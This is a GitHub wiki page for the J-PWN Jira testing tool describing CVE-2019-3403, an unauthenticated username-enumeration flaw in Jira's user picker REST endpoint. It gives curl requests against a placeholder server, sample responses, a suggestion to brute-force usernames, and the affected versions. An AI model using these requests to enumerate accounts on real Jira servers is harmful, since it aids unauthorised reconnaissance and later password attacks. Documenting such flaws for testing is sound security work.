CVE‐2019‐3403 - carnal0wnage/J-PWN GitHub Wiki
Category: [Info Disclosure]
module name: check_cve_2019_3403
url: /rest/api/2/user/picker?query=admin
+ [Info Disclosure] CVE-2019-3403 Detected
URL: http://JIRASERVER/rest/api/2/user/picker?query=admin
Total Users Found: 1
Header: Showing 1 of 1 matching users
User Details: [{'name': 'admin', 'key': 'admin', 'html': '<strong>admin</strong> (<strong>admin</strong>)', 'displayName': 'admin'}]
You can use this endpoint to brute force usernames
curl -k -v 'http://JIRASERVER/rest/api/2/user/picker?query=admin'
{"users":[{"name":"admin","key":"admin","html":"<strong>admin</strong> (<strong>admin</strong>)","displayName":"admin"}],"total":1,"header":"Showing 1 of 1 matching users"}
User not found
curl -k -v 'http://JIRASERVER/rest/api/2/user/picker?query=admin2'
{"users":[],"total":0,"header":"Showing 0 of 0 matching users"}
Description
The /rest/api/2/user/picker rest resource in Jira
- before version 7.13.3
- from version 8.0.0 before version 8.0.4
- and from version 8.1.0 before version 8.1.1
allows remote attackers to enumerate usernames via an incorrect authorization check.